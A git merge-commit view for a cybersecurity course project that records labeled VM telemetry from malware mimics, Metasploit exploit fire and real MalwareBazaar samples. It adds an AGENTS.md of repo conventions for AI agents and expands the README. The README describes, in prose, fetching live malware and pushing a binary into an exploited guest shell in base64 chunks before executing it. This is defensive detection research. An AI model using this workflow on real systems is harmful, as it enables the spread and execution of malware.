Merge origin/main into Dev_REL1_043026; accept main's service files

Cherry-picks all upstream additions (fleet runner, full collector suite,
shipper module, exploit driver, samples, scripts/, cis490_doctor, etc.)
and resolves the two service-file conflicts by accepting main's production
versions over the stubs we wrote on Day 1.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
Elliott Kolden 2026-04-30 15:05:51 -06:00
commit 7683b64929
71 changed files with 10477 additions and 214 deletions

202
AGENTS.md Normal file

@ -0,0 +1,202 @@
# AGENTS.md — guidance for AI agents working on this repo
This project is part of the spectral lab (`http://maxgit.wg/spectral/`).
The conventions below also apply to sibling repos (`wg-enroll`,
`wg-pki`, `caddy`, `iptmonads`, `matrix`, `forgejo`, `vault`,
`openclaw-deploy`).
---
## How a lab host gets to "shipping data" — the canonical bring-up
If you (an AI agent OR a human) are looking at a fresh lab host and
asking "is this thing actually generating data for the central
collector?", run this in order. **Cloning the repo by itself does
nothing. Running launchers from a manual clone bypasses the
systemd services that do the actual work.**
```sh
# 0. (One-time, on the Pi only.) Initialize the CIS490 client CA + a
# leaf cert for THIS lab host. Get its WG IP from `wg-enroll-admin
# show <usb>` first.
sudo /home/max/.env/wg-pki/scripts/init-cis490-client-ca.sh # idempotent
sudo /home/max/.env/wg-pki/scripts/deploy-cis490-cert.sh \
<host_id> <wg_ip> # mints + scp's + extracts + chmods
# 1. (On the lab host.) Install the lab-host role. This copies the
# repo into /opt/cis490, builds the venv, drops systemd units,
# fetches the Alpine baseline qcow2, and builds the cidata ISO
# with the in-guest agent embedded.
sudo /opt/cis490/scripts/install-lab-host.sh
# (or, if running from the manual clone:)
# sudo ./scripts/install-lab-host.sh
# 2. Edit /etc/cis490/lab-host.toml — set host_id and any overrides.
# 3. Verify everything before enabling the timer-driven services:
/opt/cis490/.venv/bin/python /opt/cis490/tools/cis490_doctor.py \
--role lab-host
# → green/yellow rows mean READY; red rows print the exact fix
# command. Re-run until clean.
# 4. Turn on the services. From this moment on, the orchestrator runs
# one fleet wave on each Restart= cycle, and the shipper picks up
# completed episodes and PUTs them to https://collector.wg over mTLS.
sudo systemctl enable --now cis490-shipper cis490-orchestrator
# 5. (On the Pi.) Watch the index grow:
sudo tail -f /var/lib/cis490/index.jsonl
# 6. (Optional, Tier 3.) Enable real exploit fire — needs metasploit.
sudo /opt/cis490/scripts/install-msfrpcd.sh
# Operator-supplied URL + sha256 (Rapid7 download is registration-walled):
IMAGE_URL='…' IMAGE_SHA256='…' sudo OUT_DIR=/var/lib/cis490/vm/images \
/opt/cis490/scripts/fetch-metasploitable2.sh
```
If `index.jsonl` doesn't grow within a wave-interval (~60 s after
`systemctl enable --now`), run `cis490-doctor` again. The most
common silent failures it catches:
- `*.wg` DNS missing (wg-enroll provisions it; manual workaround is
one line in `/etc/hosts`)
- mTLS cert chain not installed under `/etc/cis490/certs/`
- `cis490-shipper` service inactive (forgot step 4)
- `qemu-system-x86_64` not on PATH
`cis490-doctor --json` is machine-readable for use by other agents.
## How an agent generates data on demand (without waiting for the timer)
```sh
# One labeled episode (90 s) with a chosen sample profile:
sudo -u cis490 /opt/cis490/.venv/bin/python \
/opt/cis490/tools/run_real_vm_demo.py \
--data-root /var/lib/cis490/data \
--sample mirai-class-bot
# Force the shipper to run one pass:
sudo systemctl start cis490-shipper.service # (if disabled)
# or:
sudo -u cis490 /opt/cis490/.venv/bin/python -m shipper \
--config /etc/cis490/lab-host.toml --once
# Confirm on the Pi:
ssh <pi> 'sudo tail -3 /var/lib/cis490/index.jsonl'
```
Any tool that wants to *count* what's been shipped:
```sh
ssh <pi> 'sudo /opt/cis490/.venv/bin/python /opt/cis490/tools/index_reader.py \
--index /var/lib/cis490/index.jsonl --count-by host_id'
```
## Quick test for "is the pipe alive at all"
The `--ping` mode of the shipper does an authenticated POST to
`/v1/ping` and writes nothing to the database. Use it as the
smallest E2E test:
```sh
sudo -u cis490 /opt/cis490/.venv/bin/python -m shipper \
--config /etc/cis490/lab-host.toml --ping
# {"ok": true, "status_code": 200, ...} on success.
# Any other status is the operator's signal to read the error string.
```
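An agent that scripts this check can parse the report instead of reading it by eye. The following is a minimal sketch, assuming the shipper prints exactly one JSON object on stdout with the `ok` and `status_code` keys shown above; the helper name `ping_succeeded` is hypothetical and not part of this repo.

```python
import json


def ping_succeeded(stdout: str) -> bool:
    """Return True only for a well-formed, successful ping report.

    Assumption (not confirmed by the repo): --ping prints a single JSON
    object that contains "ok" and "status_code".
    """
    try:
        report = json.loads(stdout)
    except json.JSONDecodeError:
        return False
    if not isinstance(report, dict):
        return False
    return report.get("ok") is True and report.get("status_code") == 200
```

Anything that makes this return `False` is the cue to read the error string in the raw output.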
---
## File an issue when you hit a problem
**When you run into an issue you cannot fully resolve in the current
turn, file it as a Forgejo issue on the relevant repo before moving
on.** Do not silently log a TODO comment, leave a partial workaround,
or assume someone else will remember. The issue tracker is the
durable record.
This applies to:
- a build / test / typecheck failure you can't fix in scope
- a bug you discover but aren't tasked with fixing
- a missing dep, missing config, or env-only failure that blocks E2E
- a design gap you've worked around but want a follow-up to fix
properly
- a scope-out you made (e.g. "deferred Tier 4 sample fetch") that
needs an owner so it doesn't get lost
Don't file an issue when:
- the user is in the conversation and you can just *tell* them
- it's already filed (search first: `GET /api/v1/repos/<owner>/<repo>/issues?state=open&q=<keyword>`)
- it's truly a non-issue (a one-line edit you're about to make this
same turn)
## How to file (Forgejo API)
The local Forgejo at `http://10.100.0.1:3000` accepts API calls with a
token-bearer header:
```sh
curl -s -X POST \
-H "Authorization: token <TOKEN>" \
-H "Content-Type: application/json" \
http://10.100.0.1:3000/api/v1/repos/spectral/<repo>/issues \
-d '{
"title": "<short, action-oriented title>",
"body": "<context, repro, attempted fixes, suggested next step>"
}'
```
The token comes from the user's session — never embed one in code or
commits.
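For agents that prefer Python over `curl`, the same request can be built with the standard library. This is a sketch under stated assumptions: the helper name `build_issue_request` is hypothetical, and the token is passed in by the caller (for example from the user's session) and never hard-coded.

```python
import json
import urllib.request

FORGEJO_API = "http://10.100.0.1:3000/api/v1"


def build_issue_request(
    repo: str, title: str, body: str, token: str
) -> urllib.request.Request:
    """Build (but do not send) the POST that files an issue on spectral/<repo>."""
    payload = json.dumps({"title": title, "body": body}).encode("utf-8")
    return urllib.request.Request(
        f"{FORGEJO_API}/repos/spectral/{repo}/issues",
        data=payload,
        method="POST",
        headers={
            "Authorization": f"token {token}",
            "Content-Type": "application/json",
        },
    )
```

Sending is then a single `urllib.request.urlopen(req, timeout=10)` call. Keeping construction separate from sending makes the request easy to inspect in tests without touching the network.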
### What a good issue body contains
1. **Context** — one sentence on what was being attempted.
2. **What happened** — the actual error, log line, or unexpected
behavior. Paste exact output.
3. **What was tried** — every workaround you attempted and why it
didn't stick.
4. **Suggested next step** — the smallest change that would resolve
it, if you have a guess. "Unknown" is a fine answer.
5. **Related** — link the commit / PR / file:line where the issue
surfaced.
### What a good title looks like
| Bad | Good |
|---|---|
| `tests broken` | `tests/test_episode.py: race when t_mono_origin_ns is set in run() not __init__` |
| `caddy thing` | `Caddy: client_auth requires absolute path; relative trusted_ca_cert_file silently fails` |
| `fix later` | `shipper: 5xx backoff cap is 5min, doc says 1min — pick one` |
## After filing
- Reference the issue number in the next commit message:
`Refs spectral/<repo>#<n>` or `Closes spectral/<repo>#<n>` if your
current change actually fixes it.
- If the issue is on a different repo than the one you're committing
to, fully qualify: `spectral/wg-pki#3`.
## Other conventions
- **Don't put off the hard parts.** Reserve "deferred-with-reason" for
genuine blockers (binary not present on this machine, external
service unreachable). For anything you *could* do but find awkward
— bridge setup, cross-arch quirks, fleet concurrency — do it. The
user has flagged this twice when work was scoped down prematurely.
When something genuinely is blocked by an operator artifact, file
the Forgejo issue and *automate the bring-up* (e.g., installer
script + sha256-verifying fetcher) so the moment the artifact lands
it Just Works.
- **Naming:** never coin USB / device / service names on the user's
behalf. Ask first. Reusing an old name is especially bad.
- **`/etc` configs:** `Read` first, copy second. Never overwrite a
`/etc/...` file from a template without checking what's actually
there.
- **wg-enroll scope:** creation-only. Don't add admin /
service-activation features to it.
- **Don't expand a project's binary name beyond its own boundary:**
`openclaw` is the queue/permissions binary in `openclaw-deploy`.
This repo is `wg-enroll` (or its caller). Don't conflate.

307
README.md

@ -4,9 +4,16 @@ Course project for CIS490 (Cybersecurity). The end-goal is an ML model that
watches performance metrics on a real device, decides whether the device has
been breached, and triggers a hardware-level reset when confidence is high
enough. This repository covers the **dataset side** — we run public malware
samples against intentionally vulnerable Linux VMs and capture labeled
time-series telemetry that mirrors what the deployed model would see in the
field.
samples (and behavior-matched mimics) against intentionally vulnerable Linux
VMs and capture labeled time-series telemetry that mirrors what the deployed
model would see in the field.
Concretely, every lab host on the WireGuard mesh detects how much capacity
it has, spins up that many concurrent VMs, gives each VM a *different*
malware profile from the manifest, and ships the resulting labeled episode
tarballs to the central receiver on the Pi over mTLS. Running the same
fleet on multiple hosts gives novel, non-overlapping data per host with no
coordinator — see [Multi-host fleet](#multi-host-fleet) below.
The work is grounded in the trust-over-time scoring model from
[IEEE 9881803](https://ieeexplore.ieee.org/document/9881803).
@ -22,15 +29,33 @@ the set of timestamped phase transitions written to `labels.jsonl` —
sharing a monotonic clock with the metric rows so anything aligned in
time can be aligned in code.
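As an illustration of what the shared monotonic clock buys, each metric row can be labeled with the phase in effect at its timestamp. This is a sketch only: it assumes timestamps are integer nanoseconds and that transitions are already sorted, and the function name and tuple layout are hypothetical rather than the repo's schema.

```python
import bisect
from typing import List, Optional, Tuple


def label_rows(
    metric_times_ns: List[int],
    transitions: List[Tuple[int, str]],
) -> List[Optional[str]]:
    """Assign each metric timestamp the phase in effect at that time.

    transitions must be sorted by timestamp. Rows that precede the
    first transition get None.
    """
    starts = [t for t, _ in transitions]
    labels: List[Optional[str]] = []
    for t in metric_times_ns:
        # Index of the last transition at or before t.
        i = bisect.bisect_right(starts, t) - 1
        labels.append(transitions[i][1] if i >= 0 else None)
    return labels
```

A binary search per row keeps the join cheap even at 10 Hz sampling over long episodes.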
### Tier 2 — *real Alpine VM, real workload driven from inside the guest*
### Tier 2 — *real Alpine VM, profile-driven workload inside the guest*
This is the closest we get to real-malware behaviour without yet running
real malware. Telemetry is real `/proc/<qemu_pid>` from outside the
guest, **and the load is generated inside the guest** by busybox
``yes`` (CPU saturation) and ``dd`` (disk bursts), driven over the
serial console by `tools/vm_load_controller.py`. Every phase transition
in `labels.jsonl` corresponds to an actual command issued inside the
real VM.
guest plus three more sources running concurrently (QMP, bridge pcap,
in-guest agent — see *Telemetry sources* below). The *load* itself is
generated inside the guest by a profile-matched shell command from
[`exploits/workloads.py`](exploits/workloads.py), driven over the
serial console by [`tools/vm_load_controller.py`](tools/vm_load_controller.py).
Each sample's `profile` (from [`samples/manifest.toml`](samples/manifest.toml))
dispatches to a different in-session workload, so the envelope each
VM produces is observably different per family — exactly the variance
the ML model needs to learn:
| profile          | shape                                                    |
|------------------|----------------------------------------------------------|
| `cpu-saturate`   | sustained 1-vCPU saturation (XMRig)                      |
| `scan-and-dial`  | SYN-style probes across the bridge subnet + dial-home    |
| `io-walk`        | fs traversal + 4 KiB urandom writes (ransomware)         |
| `bursty-c2`      | long idle + periodic 3-packet egress burst (Dridex)      |
| `low-and-slow`   | minimal CPU + periodic memory churn (Kovter / fileless)  |
| `shell-resident` | one long-lived TCP socket + periodic command ticks (RAT) |
Every phase transition in `labels.jsonl` corresponds to an actual
command issued inside the real VM, and `meta.json` records which
sample / profile / kind drove it.
![Real Alpine VM envelope](docs/images/real-vm-envelope.png)
@ -41,10 +66,20 @@ controller killing the load process inside the VM. The
infected_running → dormant → infected_running re-entry is the textbook
envelope that justifies the whole project framing.
Reproduce with:
Reproduce one episode (profile-driven via `--sample` or `SAMPLE_NAME`
env, defaults to the v1 yes-loop without one):
```sh
uv run python tools/run_real_vm_demo.py --data-root data
uv run python tools/run_real_vm_demo.py --data-root data \
--sample xmrig-cryptominer
```
Or run the **fleet** — one wave of `max_concurrent` parallel episodes,
each slot pulling a different sample from the manifest:
```sh
uv run python tools/run_fleet.py --capacity # see what the host can do
uv run python tools/run_fleet.py --waves 1 --data-root data
```
### Tier 1 — *real Alpine VM, idle baseline*
@ -67,14 +102,68 @@ above produces from real KVM behaviour.
![Synthetic envelope (host-side mimic)](docs/images/synthetic-envelope.png)
### What's still missing for the real-malware envelope
### Tier 3 — *real exploit fire, profile-matched workload (Driver v2)*
The Tier-3 driver lives in [`exploits/`](exploits/README.md) — a tiny
msgpack-over-HTTPS msfrpc client + `MSFExploitDriver`. With a
[`Sample`](samples/manifest.py) supplied, the driver dispatches the
post-exploit `infected_running` workload through
[`exploits/workloads.py`](exploits/workloads.py) — same six profiles
as Tier 2, so a fleet wave produces matched envelopes whether or not
an exploit fires. Without a sample, the v1 yes-loop path is preserved
for smoke runs.
First canned module: `exploits/modules/vsftpd_234_backdoor.toml`
(Metasploitable2's CVE-2011-2523). [`scripts/install-msfrpcd.sh`](scripts/install-msfrpcd.sh)
sets up `msfrpcd` (loopback only) as a hardened systemd unit;
[`scripts/fetch-metasploitable2.sh`](scripts/fetch-metasploitable2.sh)
pulls + sha256-verifies a target image from operator-supplied URL.
### Tier 4 — *real malware sample, fetched + uploaded + executed*
A manifest entry with a `sha256` flips its `Sample.kind` to `"real"`.
The driver then bypasses the mimic profile and runs the real-binary
path:
1. [`tools/fetch_sample.py <sha256>`](tools/fetch_sample.py) pulls the
binary from MalwareBazaar (Auth-Key from
`samples/.bazaar.token` or `MALWAREBAZAAR_API_KEY`), unzips with the
standard `infected` password, sha-verifies, and lands at
`samples/store/<sha256>` (gitignored).
2. At `infected_running`, the driver chunked-uploads the binary into
the shell session as 8 KiB base64 segments
(`exploits.workloads.chunked_real_binary_upload`). 256 KiB binaries
work without buffer-busting msfrpc.
3. The session decodes, sha-verifies *again on the guest side*, chmods,
and execs only if the hash matches. Mismatch fail-stops the run.
4. `meta.sample.sha256` + per-step events
(`real_binary_upload_begin`, `real_binary_verify`,
`sample_executed{kind=real}`) record exactly which binary was run
and when, so trainers can join cleanly.
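The chunk-then-verify idea in steps 2 and 3 can be sketched host-side in a few lines. This is not the repo's `chunked_real_binary_upload`: the function names are hypothetical, and it assumes "8 KiB" refers to the length of each base64 text segment.

```python
import base64
import hashlib
from typing import List

SEGMENT_CHARS = 8 * 1024  # assumption: 8 KiB of encoded text per segment


def to_segments(binary: bytes, segment_chars: int = SEGMENT_CHARS) -> List[str]:
    """Base64-encode the binary and split the text into fixed-size segments."""
    encoded = base64.b64encode(binary).decode("ascii")
    return [
        encoded[i:i + segment_chars]
        for i in range(0, len(encoded), segment_chars)
    ]


def reassemble_and_verify(segments: List[str], expected_sha256: str) -> bytes:
    """Join and decode the segments; raise if the hash does not match."""
    binary = base64.b64decode("".join(segments))
    actual = hashlib.sha256(binary).hexdigest()
    if actual != expected_sha256:
        raise ValueError(
            f"sha256 mismatch: expected {expected_sha256}, got {actual}"
        )
    return binary
```

Raising on mismatch mirrors the fail-stop behaviour described above: nothing downstream runs unless the reassembled bytes hash to the pinned value.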
### Tier maturity
| Tier | What it gives | Status |
|---|---|---|
| 1 — real VM, idle | confidence the collector reads real KVM behaviour | ✅ done |
| 2 — real VM, real workload from inside the guest | first real-load envelope shape | ✅ done |
| 3 — real VM, real exploit fire (Metasploitable + msfrpc) | honest `armed → infecting` transitions | 🚧 |
| 4 — real VM, real malware sample (XMRig from MalwareBazaar) | the full envelope we ultimately train on | 🚧 |
| 1 — real VM, idle | confidence the collectors read real KVM behaviour | ✅ done |
| 2 — real VM, profile-driven workload | distinguishable in-guest envelopes per malware family | ✅ done |
| 3 — real VM, real exploit fire + profile workload | honest `armed → infecting` transitions, driver v2 dispatch | ✅ code; ⏳ awaiting Metasploitable2 image + msfrpcd on a lab host |
| 4 — real VM, real malware sample (MalwareBazaar fetch) | the full envelope we ultimately train on | ✅ code; ⏳ awaiting MalwareBazaar API key + sha256s in manifest |
### Telemetry sources (all five wire into one episode dir)
| # | Source                         | Vantage       | Role                 |
|---|--------------------------------|---------------|----------------------|
| 1 | host `/proc/<qemu_pid>`        | outside       | oracle (label only)  |
| 2 | QEMU QMP queries               | outside       | oracle (label only)  |
| 3 | `perf stat -p <qemu_pid>`      | outside       | oracle (label only)  |
| 4 | Bridge pcap → 100 ms netflow   | gateway-side  | feature (deployable) |
| 5 | In-guest agent (virtio-serial) | inside        | feature (deployable) |
All five are live. The deploy/oracle split follows
[`docs/threat-model.md`](docs/threat-model.md): only sources 4 + 5
are usable as model *features* in the field — sources 1, 2, 3 exist
as labeling oracles only.
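To make source 4's "100 ms netflow" concrete, here is a minimal sketch of fixed-width time bucketing. It is not the repo's bucketizer: the input shape (pairs of nanosecond timestamp and packet length) and the output keys are assumptions chosen for illustration.

```python
from collections import defaultdict
from typing import Dict, List, Tuple

BUCKET_NS = 100_000_000  # 100 ms expressed in nanoseconds


def bucketize(
    packets: List[Tuple[int, int]], bucket_ns: int = BUCKET_NS
) -> Dict[int, Dict[str, int]]:
    """Aggregate (timestamp_ns, length_bytes) pairs into fixed-width buckets.

    Keys of the result are bucket start times in nanoseconds.
    """
    buckets: Dict[int, Dict[str, int]] = defaultdict(
        lambda: {"packets": 0, "bytes": 0}
    )
    for t_ns, length in packets:
        start = (t_ns // bucket_ns) * bucket_ns
        buckets[start]["packets"] += 1
        buckets[start]["bytes"] += length
    return dict(buckets)
```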
For an interactive view of any episode (zoom/pan/hover), run:
@ -85,83 +174,135 @@ tools/show_envelope.sh data/episodes/<episode_id>
---
## Status
## Status (106/106 tests passing as of `a88ac83`)
- ✅ Receiver (HTTPS PUT, sha256-verified, idempotent) — tested with httpx + curl
- ✅ Orchestrator v0 — single- and scheduled-phase modes, ULID episode ids
- ✅ Host /proc oracle collector (source 1 of 5) at 10 Hz
- ✅ Synthetic envelope demo — full 8-phase envelope produced end-to-end
- ✅ Real VM (Alpine 3.21 cloud-init under KVM) — orchestrator collects against the real `qemu-system` pid
- ✅ **Tier 2 — real VM, real workload:** serial-console-driven load controller fires `yes`/`dd` inside the guest at every phase transition
- 🚧 QMP collector (source 2), bridge pcap collector (source 4), in-guest agent (source 5)
- 🚧 Exploit driver (Metasploit RPC) for `armed → infecting` transitions on `session_open`
- 🚧 Shipper (the third leg of the WG pipeline — receiver and orchestrator already verified)
**Pipeline (lab-host → Pi → tarball stored)**
- ✅ Receiver app (HTTPS PUT, sha256-verified, idempotent) — running on the Pi behind Caddy with mTLS via the wg-pki client CA
- ✅ `POST /v1/ping` smoke endpoint (writes nothing, exercises the full auth path)
- ✅ Shipper (`shipper/`) — tar+zstd, retry/backoff, `--ping` mode
- ✅ Caddy `collector.wg` block (in `spectral/caddy`)
- ✅ Lab-host install script + systemd units (`scripts/install-lab-host.sh`, `etc/cis490-{shipper,orchestrator}.service`)
- ✅ Receiver install script (`scripts/install-receiver.sh`)
- ✅ wg-pki client-CA bootstrap + per-host leaf issuance (in `spectral/wg-pki`)
> **Topology note:** in this project the **Pi5 is the WireGuard-side
> *collector*** that receives episode tarballs from one or more lab hosts.
> It is *not* the deployment target for the model. The deployment target is
> generic ("any constrained Linux device"). See
**Telemetry**
- ✅ Source 1 — host `/proc/<qemu_pid>` @ 10 Hz
- ✅ Source 2 — QEMU QMP @ 1 Hz
- ✅ Source 3 — `perf stat -p <qemu_pid>` (opt-in via `enable_perf`; needs `CAP_SYS_ADMIN` / `CAP_PERFMON`)
- ✅ Source 4 — bridge pcap + 100 ms netflow bucketizer (pure-Python parser, no scapy/dpkt dep), wired into `EpisodeRunner` via `bridge_iface`
- ✅ Source 5 — in-guest agent over virtio-serial; cidata-embedded for first-boot install on Alpine
**Orchestrator + drivers**
- ✅ Orchestrator v0 — phase-scheduled episode runner, ULID episode ids
- ✅ Snapshot/revert via QMP `loadvm` (`revert_at_start` / `revert_at_end`) for clean baselines between episodes
- ✅ Tier 2 driver — real Alpine VM, profile-driven in-guest workload over serial console
- ✅ Tier 3 driver v2 — `MSFExploitDriver` + msfrpc client + per-sample workload dispatch; first canned module `vsftpd_234_backdoor.toml`
- ✅ Tier 4 — `tools/fetch_sample.py` (MalwareBazaar by sha256) + chunked real-binary upload (`exploits.workloads.chunked_real_binary_upload`) + guest-side sha-verify-then-exec dispatch in `MSFExploitDriver`
- ⏳ Tier 3 integration — needs operator to drop a Metasploitable2 image + run `scripts/install-msfrpcd.sh` on a lab host
- ⏳ Tier 4 integration — needs operator's MalwareBazaar API key + at least one `sha256` entry in `samples/manifest.toml`
**Fleet (multi-VM, multi-host data generation)**
- ✅ Resource-aware capacity detector (cores / RAM / load) — `orchestrator/fleet.py`
- ✅ Concurrent slot runner — `tools/run_fleet.py`
- ✅ Sample manifest with six behavioural profiles + deterministic per-(host_id, slot, episode) selection so every host walks the catalog in a different order
> **Topology note:** the **Pi5 is the WireGuard-side *collector*** that
> receives episode tarballs from one or more lab hosts. It is *not* the
> deployment target for the model. The deployment target is generic
> ("any constrained Linux device"). See
> [`docs/architecture.md`](docs/architecture.md).
---
<details>
<summary><b>Quick start — run the synthetic envelope demo (~90 s)</b></summary>
<summary><b>Quick start — fleet mode (the primary workflow)</b></summary>
```sh
git clone https://maxgit.wg/spectral/CIS490.git
cd CIS490
# One-time setup.
uv sync
# Generate one labeled episode (8 phases, 851 telemetry rows, 85 s).
uv run python tools/run_envelope_demo.py --data-root data
# 1. Build the cidata ISO with the in-guest agent baked in.
uv run python tools/build_cidata.py vm/images/cidata.iso
# Render a static PNG envelope of that episode.
uv run python tools/plot_envelope.py data/episodes/<episode_id>
# 2. See what this host is sized for.
uv run python tools/run_fleet.py --capacity
# cores: 4 (reserve 1)
# ram: 7951 MiB total, 5223 MiB available (headroom 1024 MiB, per-vm 320 MiB)
# load: 1m=0.51
# caps: by_cores=3, by_ram=13, by_load=3
# --> max_concurrent VMs: 3
# Or open an interactive plot in your browser:
# 3. Run one wave (= max_concurrent parallel episodes, each with a
# different sample profile).
uv run python tools/run_fleet.py --waves 1 --data-root data
# 4. Plot any episode (matplotlib WebAgg).
tools/show_envelope.sh data/episodes/<episode_id>
```
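The sample `--capacity` output is consistent with taking the minimum of three per-resource caps. The sketch below reproduces that arithmetic under that assumption; it is not the code in `orchestrator/fleet.py`, and `by_load` is taken as an input because the load-based formula is not shown in this README.

```python
def max_concurrent_vms(
    cores: int,
    reserve_cores: int,
    ram_available_mib: int,
    headroom_mib: int,
    per_vm_mib: int,
    by_load: int,
) -> int:
    """Combine per-resource caps into one VM count (hypothetical helper)."""
    # Cores left after reserving some for the host itself.
    by_cores = max(cores - reserve_cores, 0)
    # Whole VMs that fit in available RAM once the headroom is set aside.
    by_ram = max((ram_available_mib - headroom_mib) // per_vm_mib, 0)
    return max(min(by_cores, by_ram, by_load), 0)
```

With the figures printed above (4 cores with 1 reserved, 5223 MiB available, 1024 MiB headroom, 320 MiB per VM, load cap 3), the core cap is 3, the RAM cap is 13, and the result is 3.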
The data lands in `data/episodes/<ulid>/`:
Each episode dir contains:
```
meta.json episode metadata (image, snapshot, schedule, host fingerprint)
events.jsonl orchestrator actions (snapshot_load, phase_transition, episode_end)
meta.json episode metadata (image, sample, profile, fleet capacity)
events.jsonl orchestrator + driver events (exploit_fire, session_open, sample_executed, ...)
labels.jsonl one row per phase transition — THIS is the envelope
telemetry-proc.jsonl host /proc sampler at 10 Hz
telemetry-proc.jsonl source 1: host /proc sampler @ 10 Hz
telemetry-qmp.jsonl source 2: QMP query-status / blockstats / kvm stats @ 1 Hz
telemetry-guest.jsonl source 5: in-guest agent (CPU jiffies, mem, listen ports, top procs)
network.pcap source 4: tcpdump on br-malware
netflow.jsonl source 4: 100 ms-bucketed pcap aggregation
done.marker written last; the shipper only sees finished episodes
```
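The `done.marker` convention makes it easy for any tool to skip episodes that are still being written. This is a minimal sketch, not the shipper's actual scan; the function name is hypothetical.

```python
from pathlib import Path
from typing import List


def finished_episodes(episodes_root: Path) -> List[Path]:
    """Return episode dirs that contain done.marker, sorted by name."""
    return sorted(
        p for p in episodes_root.iterdir()
        if p.is_dir() and (p / "done.marker").is_file()
    )
```

Because ULIDs sort lexicographically by creation time, sorting by directory name yields the oldest finished episode first.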
</details>
<details>
<summary><b>Quick start — boot a real Linux VM (Cirros)</b></summary>
The phase-2 launcher boots a Cirros qcow2 under KVM and exposes its
QMP/monitor sockets and pidfile. The orchestrator then samples the real
`qemu-system` process.
<summary><b>Quick start — single episode, no fleet</b></summary>
```sh
# Pre-staged: vm/images/cirros-baseline.qcow2 with snapshot 'baseline-v1'.
# (See docs/sources.md for the Cirros sha256.)
# Tier 2 (no exploit, profile-driven workload):
uv run python tools/run_real_vm_demo.py --data-root data \
--sample mirai-class-bot
# Boot in one terminal:
RUN_DIR=/tmp/cis490-vm vm/launch_demo.sh
# In another terminal, point the orchestrator at the VM's pid:
QPID=$(cat /tmp/cis490-vm/qemu.pid)
uv run python -m orchestrator --target-pid $QPID --duration 20
# Plot:
tools/show_envelope.sh data/episodes/<episode_id>
# Tier 3 (real exploit fire via msfrpcd):
MSFRPC_PASSWORD=$(. /etc/cis490/msfrpc.env; echo $MSFRPC_PASSWORD) \
uv run python tools/run_tier3_demo.py \
--module vsftpd_234_backdoor \
--sample ransomware-mimic \
--data-root data
```
The idle-VM envelope shape is distinct from the synthetic load: periodic
~10% CPU spikes from KVM/timer interrupts, flat ~230 MiB RSS, a single
late-boot disk write. That's a real KVM guest you're seeing.
</details>
<details>
<summary><b>Multi-host fleet — how cross-host diversity works</b></summary>
Each lab host's `host_id` (set in `/etc/cis490/lab-host.toml`) seeds a
deterministic walk through the sample catalog:
```python
# samples/manifest.py
def select(self, *, host_id, slot, episode_index):
seed = f"{host_id}|{slot}|{episode_index}"
idx = sha256(seed)[:8] % len(self.samples)
return self.samples[idx]
```
So:
- `host=alice slot=0 ep=0` and `host=bob slot=0 ep=0` almost certainly
pick *different* samples (test asserts < 25% collision over 20 trials).
- A single host walks the entire catalog within ~`len(manifest)` waves
(test confirms full coverage in 200 episodes).
- No coordinator needed — every host independently produces non-overlapping
data, and `meta.fleet.host_id` + `meta.sample.name` make the join trivial
at training time.
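The `select` snippet above is abbreviated. A runnable sketch of the same idea follows, assuming the first 8 bytes of the SHA-256 digest are read as a big-endian integer; the real `samples/manifest.py` may derive the index differently, and `select_index` is a hypothetical name.

```python
import hashlib


def select_index(host_id: str, slot: int, episode_index: int, n_samples: int) -> int:
    """Map (host_id, slot, episode_index) to a stable catalog index."""
    seed = f"{host_id}|{slot}|{episode_index}".encode("utf-8")
    digest = hashlib.sha256(seed).digest()
    # Assumption: interpret the first 8 digest bytes as a big-endian integer.
    return int.from_bytes(digest[:8], "big") % n_samples
```

The result depends only on its inputs, so two runs on the same host reproduce the same walk, while a different `host_id` reshuffles it without any shared state.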
The fleet runner shells out to the same `tools/run_real_vm_demo.py` per
slot, with `SLOT` / `RUN_DIR` / `SAMPLE_NAME` env passed through to the
launcher. Each VM gets its own QMP socket, agent socket, hostfwd port
range, and episode dir, so concurrency is collision-free up to the
capacity ceiling.
</details>
@ -177,15 +318,18 @@ late-boot disk write. That's a real KVM guest you're seeing.
| [`docs/deploy.md`](docs/deploy.md) | One-command install for the lab-host and receiver roles |
| [`docs/lab-setup.md`](docs/lab-setup.md) | KVM prereqs, VM build, snapshot, virtio-serial wiring |
| [`docs/sources.md`](docs/sources.md) | Works cited — every tool, dep, sample source, paper, and standard |
| `orchestrator/` | State machine that drives the boot → arm → detonate → observe → revert loop |
| `collectors/` | One module per telemetry source (host /proc, QMP, perf, pcap, guest agent) |
| `receiver/` | Starlette app: PUT /v1/episodes ingest, sha256-verified, idempotent |
| `vm/` | qcow2 images, launch scripts, snapshot recipes (binaries gitignored) |
| `tools/` | Demo runners, load mimic, plot scripts |
| `exploits/` | Metasploit resource scripts for repeatable exploitation (TODO) |
| `samples/` | Sample manifest (sha256-pinned). **Binaries never committed.** |
| `orchestrator/` | Episode runner + `fleet.py` (capacity detection, concurrent slot driver) |
| `collectors/` | One module per telemetry source: `proc_qemu`, `qmp`, `pcap`, `guest_agent` |
| `receiver/` | Starlette app: PUT `/v1/episodes` + POST `/v1/ping`, sha256-verified, idempotent |
| `shipper/` | Lab-host-side: scan `data/episodes/`, tar+zstd, PUT over mTLS, retry/backoff |
| `vm/` | Launch scripts (`launch_demo.sh`, `launch_target.sh`), `setup_bridge.sh`, in-guest agent at `vm/guest-agent/cis490_agent.py`. qcow2 images and pcap captures gitignored. |
| `tools/` | `run_fleet.py`, `run_real_vm_demo.py`, `run_tier3_demo.py`, `build_cidata.py`, `plot_envelope.py`, `show_envelope.sh` |
| [`exploits/`](exploits/README.md) | MSF RPC client (`msfrpc.py`), `driver.py` (v2 with sample dispatch), `workloads.py` (six profile-matched in-session loops), per-module TOML configs |
| [`samples/`](samples/manifest.toml) | Sample manifest + loader. Binaries land at `samples/store/<sha256>` (gitignored). |
| `scripts/` | `install-{lab-host,receiver,msfrpcd}.sh`, `fetch-metasploitable2.sh` |
| `training/` | Model training code (deferred — schema first) |
| `etc/` | systemd units and config templates installed by the deploy scripts |
| `etc/` | systemd units and config templates (`cis490-{receiver,shipper,orchestrator}.service`, `lab-host.toml.example`, `receiver.toml.example`) |
| [`AGENTS.md`](AGENTS.md) | Conventions for AI agents working on this and sibling spectral repos |
</details>
@ -226,17 +370,26 @@ Two roles, one bootstrap command each. Detailed in
`index.jsonl`. Runs on the Pi5 in our setup.
```sh
# On a lab host:
./scripts/install-lab-host.sh # (TODO — currently bring up by hand per docs/deploy.md)
# On the Pi5 (or any always-on WG node):
./scripts/install-receiver.sh # (TODO — same)
sudo ./scripts/install-receiver.sh
# Add the collector.wg block to spectral/caddy (already merged), then:
sudo systemctl enable --now cis490-receiver
# One-time, on the Pi: bootstrap the CIS490 client CA.
